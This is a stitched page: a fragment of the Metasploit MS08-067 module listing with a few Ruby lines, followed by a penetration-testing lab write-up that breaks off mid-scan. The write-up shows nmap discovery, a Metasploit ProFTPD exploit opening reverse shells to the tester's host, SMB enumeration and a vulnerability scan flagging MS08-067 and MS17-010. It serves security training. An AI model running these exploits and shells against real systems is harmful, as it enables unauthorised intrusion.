1146:	    disconnect
1147:	
1148:	    if (error == 0x0052005c) # R :)
1149:	      return Msf::Exploit::CheckCode::Vulnerable
1150:	    else
1151:	      vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
1152:	      return Msf::Exploit::CheckCode::Safe
1153:	    end
1154:	  end
1155:	
1156:	  def generate_rop(version)

Unable to locate key: «<E>»

Here is a relevant code snippet related to the «Unable to locate key: «<E>»» error message:

1253:	    rvas = rvasets[version]
1254:	
1255:	    rop.map! { |e|
1256:	      if e.kind_of? String
1257:	        # Meta-replace (RVA)
1258:	        fail_with(Failure::BadConfig, "Unable to locate key: "#{e}"") unless rvas[e]
1259:	        module_base + rvas[e]
1260:	
1261:	      elsif e == :unused
1262:	        # Randomize
1263:	        rand_text(4).unpack('V').first

Go back to menu.

  • #14213 Merged Pull Request: Add disclosure date rubocop linting rule — enforce iso8601 disclosure dates
  • #13417 Merged Pull Request: SMBv3 integration with Framework
  • #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits ‘n bobs)
  • #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
  • #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
  • #6659 Merged Pull Request: Fix #6658, MS08-067 unable to find the right target for W2k3SP0
  • #6655 Merged Pull Request: use MetasploitModule as a class name
  • #6648 Merged Pull Request: Change metasploit class names
  • #6491 Merged Pull Request: Shrink the size of ms08_067 so that it again works with bind_tcp
  • #6283 Merged Pull Request: increase the amount of space needed for ms08_067
  • #5466 Merged Pull Request: Add butchered version of CVE-2015-1701
  • #5529 Merged Pull Request: MS08-067 NetAPI Exploit — Added Windows 2003 SP1 & SP2 French targets
  • #4768 Merged Pull Request: Reorganize SMB mixins
  • #3543 Merged Pull Request: Rubocop -a on MS08-067 module
  • #3162 Merged Pull Request: Microsoft module name changes
  • #2922 Merged Pull Request: Multi-threaded check command, plus aux scanner support
  • #2905 Merged Pull Request: Update Exploit Checks and a msftidy to go with it
  • #2525 Merged Pull Request: Change module boilerplate
  • #2287 Merged Pull Request: updated contact info on ms08-067
  • #2229 Merged Pull Request: Add fail_with() to all module types, move Failure constants to Msf::Module

References

  • CVE-2008-4250
  • OSVDB (49243)
  • MS08-067
  • http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

See Also

Check also the following modules related to this module:

  • exploit/windows/smb/cve_2020_0796_smbghost
  • exploit/windows/smb/generic_smb_dll_injection
  • exploit/windows/smb/group_policy_startup
  • exploit/windows/smb/ipass_pipe_exec
  • exploit/windows/smb/ms03_049_netapi
  • exploit/windows/smb/ms04_007_killbill
  • exploit/windows/smb/ms04_011_lsass
  • exploit/windows/smb/ms04_031_netdde
  • exploit/windows/smb/ms05_039_pnp
  • exploit/windows/smb/ms06_025_rasmans_reg
  • exploit/windows/smb/ms06_025_rras
  • exploit/windows/smb/ms06_040_netapi
  • exploit/windows/smb/ms06_066_nwapi
  • exploit/windows/smb/ms06_066_nwwks
  • exploit/windows/smb/ms06_070_wkssvc
  • exploit/windows/smb/ms07_029_msdns_zonename
  • exploit/windows/smb/ms09_050_smb2_negotiate_func_index
  • exploit/windows/smb/ms10_046_shortcut_icon_dllloader
  • exploit/windows/smb/ms10_061_spoolss
  • exploit/windows/smb/ms15_020_shortcut_icon_dllloader
  • exploit/windows/smb/ms17_010_eternalblue
  • exploit/windows/smb/ms17_010_eternalblue_win8
  • exploit/windows/smb/ms17_010_psexec
  • exploit/windows/smb/netidentity_xtierrpcpipe
  • exploit/windows/smb/psexec
  • exploit/windows/smb/smb_delivery
  • exploit/windows/smb/smb_doublepulsar_rce
  • exploit/windows/smb/smb_relay
  • exploit/windows/smb/smb_rras_erraticgopher
  • exploit/windows/smb/smb_shadow
  • exploit/windows/smb/timbuktu_plughntcommand_bof
  • exploit/windows/smb/webexec
  • exploit/netware/smb/lsass_cifs

Related Nessus plugins:

  • Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)
  • MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution (958644) (ECLIPSEDWING)
  • MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check)
  • MS08-067: Vulnerability in Server Service Could Allow Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check / IPS)
  • hdm
  • Brett Moore <brett.moore[at]insomniasec.com>
  • frank2 <frank2[at]dc949.org>
  • jduck

Version

This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.


Go back to menu.

Источник

Ok I finally got around to continuing with the PTP labs. This lab is somewhat introductory, since all it requires is Nessus to scan for vulnerabilities then exploit with the appropriate Metasploit module. But I decided to do it without either Nessus (or any vulnerability scanners other than Nmap’s script engine) or Metasploit, primarily to prepare for OSCP. For the Windows machine it was doable but I have yet to find a working exploit for the FTP server outside of Metasploit. When I do I’ll update it here.

We are given the following network IP and scope of engagement

Our IP: 172.16.5.50
Scope of engagement: 10.50.97.0/24

Begin by searching for alive hosts

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -sn -n 10.50.97.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 00:09 +08
Nmap scan report for 10.50.97.1
Host is up (0.49s latency).
Nmap scan report for 10.50.97.5
Host is up (0.49s latency).
Nmap scan report for 10.50.97.8
Host is up (0.49s latency).
Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Nmap scan report for 10.50.97.21
Host is up (0.34s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 29.41 seconds

Enumerate the running services

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -Pn -sV -n 10.50.97.5,8,14,21

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 00:11 +08
Stats: 0:06:21 elapsed; 0 hosts completed (4 up), 4 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.32% done; ETC: 00:20 (0:02:32 remaining)
Nmap scan report for 10.50.97.5
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Nmap scan report for 10.50.97.8
Host is up (0.24s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 10.50.97.21
Host is up (0.25s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.2a
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 606.24 seconds

All but one host are Windows based. We can exploit the FTP server by finding the appropriate Metasploit module and running it which is pretty straight forward.

msf5 > search ProFTPD 1.3.2

Matching Modules
================

   Name                                                         Disclosure Date  Rank       Check  Description
   ----                                                         ---------------  ----       -----  -----------
   exploit/freebsd/ftp/proftp_telnet_iac                        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace                            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac                          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent                  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   exploit/multi/http/jira_hipchat_template                     2015-10-28       excellent  Yes    Atlassian HipChat for Jira Plugin Velocity Template Injection
   exploit/multi/http/wikka_spam_exec                           2011-11-30       excellent  Yes    WikkaWiki 1.3.2 Spam Logging PHP Injection
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   exploit/unix/ftp/proftpd_133c_backdoor                       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec                        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   exploit/windows/http/apache_chunked                          2002-06-19       good       Yes    Apache Win32 Chunked Encoding
   exploit/windows/http/apache_mod_rewrite_ldap                 2006-07-28       great      Yes    Apache Module mod_rewrite LDAP Protocol Buffer Overflow

msf5 exploit(freebsd/ftp/proftp_telnet_iac) > show options

Module options (exploit/freebsd/ftp/proftp_telnet_iac):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS   10.50.97.21          yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(freebsd/ftp/proftp_telnet_iac) > exploit

[*] Started reverse TCP handler on 172.16.5.50:4444 
[*] 10.50.97.21:21 - Automatically detecting the target...
[*] 10.50.97.21:21 - FTP Banner: 220 ProFTPD 1.3.2a Server (ProFTPD) [10.50.97.21]
[*] 10.50.97.21:21 - Selected Target: ProFTPD 1.3.2a Server (FreeBSD 8.0)
[*] 10.50.97.21:21 - Trying return address 0xbfbffdfc...
[*] 10.50.97.21:21 - Trying return address 0xbfbffbfc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff9fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff7fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff5fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff3fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff1fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbfeffc...
[*] 10.50.97.21:21 - Trying return address 0xbfbfedfc...
[*] 10.50.97.21:21 - Trying return address 0xbfbfebfc...
[*] Command shell session 1 opened (172.16.5.50:4444 -> 10.50.97.21:55929) at 2019-02-20 00:39:51 +0800
[*] Command shell session 2 opened (172.16.5.50:4444 -> 10.50.97.21:25446) at 2019-02-20 00:39:51 +0800


id
uid=0(root) gid=0(wheel) euid=65534(nobody) egid=65533(nogroup) groups=65533(nogroup)
whoami
nobody

Ok with that out of the way let’s look at the Windows boxes. At first I checked if I could use smbmap to enumerate the shares. Note as before I cover my failed attempts as well. Skip to read what works here.

root@Kali:~# smbmap -H 10.50.97.5
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.50.97.5...
[+] IP: 10.50.97.5:445	Name: 10.50.97.5                                        
	Disk                                                  	Permissions
	----                                                  	-----------
[!] Access Denied
root@Kali:~# smbmap -H 10.50.97.8
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.50.97.8...
[+] IP: 10.50.97.8:445	Name: 10.50.97.8                                        
	Disk                                                  	Permissions
	----                                                  	-----------
[!] Access Denied
root@Kali:~# smbmap -H 10.50.97.14
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.50.97.14...
[+] IP: 10.50.97.14:445	Name: 10.50.97.14                                       
	Disk                                                  	Permissions
	----                                                  	-----------
[!] Access Denied

No luck there. I tried other SMB tools for host 5

root@Kali:~# nmblookup -A 10.50.97.5
Looking up status of 10.50.97.5
	ELS-WINXP       00 -         B  
	WORKGROUP       00 -  B  
	ELS-WINXP       20 -         B  
	WORKGROUP       1e -  B  

	MAC Address = 00-50-56-A1-38-43

root@Kali:~# smbclient //10.50.97.5/IPC$ -U""
WARNING: The "syslog" option is deprecated
Enter WORKGROUProot's password: 
session setup failed: NT_STATUS_INVALID_PARAMETER
root@Kali:~# smbclient -L 10.50.97.5
WARNING: The "syslog" option is deprecated
Enter WORKGROUProot's password: 
session setup failed: NT_STATUS_INVALID_PARAMETER

Still no luck. At this point I threw enum4linux at the 3 hosts to see what stuck.

root@Kali:~# enum4linux -a -v 10.50.97.5
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 20 01:01:31 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.50.97.5
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================== 
|    Enumerating Workgroup/Domain on 10.50.97.5    |
 ================================================== 
[V] Attempting to get domain name with command: nmblookup -A '10.50.97.5'
[+] Got domain/workgroup name: WORKGROUP

 ========================================== 
|    Nbtstat Information for 10.50.97.5    |
 ========================================== 
Looking up status of 10.50.97.5
	ELS-WINXP        -         B   Workstation Service
	WORKGROUP        -  B   Domain/Workgroup Name
	ELS-WINXP        -         B   File Server Service
	WORKGROUP        -  B   Browser Service Elections

	MAC Address = 00-50-56-A1-38-43

 =================================== 
|    Session Check on 10.50.97.5    |
 =================================== 
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'10.50.97.5'/ipc$ -U''%'' -c 'help' 2>&1
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

No luck. Neither for hosts 8, 14

root@Kali:~# enum4linux -a -v 10.50.97.8
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 20 01:03:32 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.50.97.8
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================== 
|    Enumerating Workgroup/Domain on 10.50.97.8    |
 ================================================== 
[V] Attempting to get domain name with command: nmblookup -A '10.50.97.8'
[+] Got domain/workgroup name: WORKGROUP

 ========================================== 
|    Nbtstat Information for 10.50.97.8    |
 ========================================== 
Looking up status of 10.50.97.8
	ELS-WINSER2003   -         B   Workstation Service
	WORKGROUP        -  B   Domain/Workgroup Name
	ELS-WINSER2003   -         B   File Server Service
	WORKGROUP        -  B   Browser Service Elections
	WORKGROUP        -         B   Master Browser
	..__MSBROWSE__.  -  B   Master Browser

	MAC Address = 00-50-56-A1-BF-DB

 =================================== 
|    Session Check on 10.50.97.8    |
 =================================== 
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'10.50.97.8'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 10.50.97.8 allows sessions using username '', password ''

 ========================================= 
|    Getting domain SID for 10.50.97.8    |
 ========================================= 
[V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 10.50.97.8 -c 'lsaquery' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER
[+] Can't determine if host is part of domain or part of a workgroup

 ==================================== 
|    OS information on 10.50.97.8    |
 ==================================== 
[V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'10.50.97.8'/ipc$ -U''%'' -c 'q' 2>&1
[+] Got OS info for 10.50.97.8 from smbclient: Domain=[ELS-WINSER2003] OS=[Windows Server 2003 3790 Service Pack 1] Server=[Windows Server 2003 5.2]
[V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '10.50.97.8' 2>&1
[+] Got OS info for 10.50.97.8 from srvinfo:
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

 =========================== 
|    Users on 10.50.97.8    |
 =========================== 
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '10.50.97.8' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '10.50.97.8' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================= 
|    Share Enumeration on 10.50.97.8    |
 ======================================= 
[V] Attempting to get share list using authentication
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.50.97.8

 ================================================== 
|    Password Policy Information for 10.50.97.8    |
 ================================================== 
[V] Attempting to get Password Policy info with command: polenum '':''@'10.50.97.8' 2>&1
[E] Unexpected error from polenum:


[+] Attaching to 10.50.97.8 using a NULL share

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[+] Trying protocol 139/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c "getdompwinfo" 2>&1

[+] Retieved partial password policy with rpcclient:
 ============================ 
|    Groups on 10.50.97.8    |
 ============================ 
[V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'enumalsgroups builtin' 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'enumalsgroups domain' 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

 ===================================================================== 
|    Users on 10.50.97.8 via RID cycling (RIDS: 500-550,1000-1050)    |
 ===================================================================== 
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames guest' 2>&1
[V] Assuming that user "guest" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames krbtgt' 2>&1
[V] Assuming that user "krbtgt" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames domain admins' 2>&1
[V] Assuming that user "domain admins" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames root' 2>&1
[V] Assuming that user "root" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames bin' 2>&1
[V] Assuming that user "bin" exists
[V] Attempting to get SID from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c 'lookupnames none' 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 10.50.97.8 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.8' -c lsaenumsid 2>&1

 =========================================== 
|    Getting printer info for 10.50.97.8    |
 =========================================== 
[V] Attempting to get printer info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'enumprinters' '10.50.97.8' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

enum4linux complete on Wed Feb 20 01:04:05 2019


root@Kali:~# enum4linux -a -v 10.50.97.14
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 20 01:05:14 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.50.97.14
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =================================================== 
|    Enumerating Workgroup/Domain on 10.50.97.14    |
 =================================================== 
[V] Attempting to get domain name with command: nmblookup -A '10.50.97.14'
[+] Got domain/workgroup name: WORKGROUP

 =========================================== 
|    Nbtstat Information for 10.50.97.14    |
 =========================================== 
Looking up status of 10.50.97.14
	ELS-WIN03        -         B   Workstation Service
	WORKGROUP        -  B   Domain/Workgroup Name
	ELS-WIN03        -         B   File Server Service
	WORKGROUP        -  B   Browser Service Elections

	MAC Address = 00-50-56-A1-3F-53

 ==================================== 
|    Session Check on 10.50.97.14    |
 ==================================== 
[V] Attempting to make null session using command: smbclient -W 'WORKGROUP' //'10.50.97.14'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 10.50.97.14 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.50.97.14    |
 ========================================== 
[V] Attempting to get domain SID with command: rpcclient -W 'WORKGROUP' -U''%'' 10.50.97.14 -c 'lsaquery' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER
[+] Can't determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on 10.50.97.14    |
 ===================================== 
[V] Attempting to get OS info with command: smbclient -W 'WORKGROUP' //'10.50.97.14'/ipc$ -U''%'' -c 'q' 2>&1
[+] Got OS info for 10.50.97.14 from smbclient: Domain=[ELS-WIN03] OS=[Windows Server 2003 3790 Service Pack 1] Server=[Windows Server 2003 5.2]
[V] Attempting to get OS info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'srvinfo' '10.50.97.14' 2>&1
[+] Got OS info for 10.50.97.14 from srvinfo:
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

 ============================ 
|    Users on 10.50.97.14    |
 ============================ 
[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c querydispinfo -U''%'' '10.50.97.14' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

[V] Attempting to get userlist with command: rpcclient -W 'WORKGROUP' -c enumdomusers -U''%'' '10.50.97.14' 2>&1
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================== 
|    Share Enumeration on 10.50.97.14    |
 ======================================== 
[V] Attempting to get share list using authentication
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.50.97.14

 =================================================== 
|    Password Policy Information for 10.50.97.14    |
 =================================================== 
[V] Attempting to get Password Policy info with command: polenum '':''@'10.50.97.14' 2>&1
[E] Unexpected error from polenum:


[+] Attaching to 10.50.97.14 using a NULL share

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[+] Trying protocol 139/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[V] Attempting to get Password Policy info with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c "getdompwinfo" 2>&1

[+] Retieved partial password policy with rpcclient:
 ============================= 
|    Groups on 10.50.97.14    |
 ============================= 
[V] Getting builtin groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'enumalsgroups builtin' 2>&1

[+] Getting builtin groups:

[+] Getting builtin group memberships:
[V] Getting local groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'enumalsgroups domain' 2>&1

[+] Getting local groups:

[+] Getting local group memberships:
[V] Getting domain groups with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c "enumdomgroups" 2>&1

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.50.97.14 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames guest' 2>&1
[V] Assuming that user "guest" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames krbtgt' 2>&1
[V] Assuming that user "krbtgt" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames domain admins' 2>&1
[V] Assuming that user "domain admins" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames root' 2>&1
[V] Assuming that user "root" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames bin' 2>&1
[V] Assuming that user "bin" exists
[V] Attempting to get SID from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c 'lookupnames none' 2>&1
[V] Assuming that user "none" exists
[V] Attempting to get SIDs from 10.50.97.14 with command: rpcclient -W 'WORKGROUP' -U''%'' '10.50.97.14' -c lsaenumsid 2>&1

 ============================================ 
|    Getting printer info for 10.50.97.14    |
 ============================================ 
[V] Attempting to get printer info with command: rpcclient -W 'WORKGROUP' -U''%'' -c 'enumprinters' '10.50.97.14' 2>&1
Cannot connect to server.  Error was NT_STATUS_INVALID_PARAMETER

enum4linux complete on Wed Feb 20 01:05:46 2019

So no null session vulnerability. I then tried all the nmap SMB scripts, but after one hour the scan still wasn’t done, so I aborted.

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -sV -Pn -n --script=smb* 10.50.97.5,8,14
Stats: 1:07:43 elapsed; 0 hosts completed (3 up), 3 undergoing Script Scan
NSE Timing: About 89.80% done; ETC: 01:42 (0:05:19 remaining)

Finally I decided on an approach which yielded something. Run only the nmap vuln scripts

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -Pn -n --script vuln 10.50.97.5,8,14

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 20:07 +08
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.50.97.5
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 10.50.97.8
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
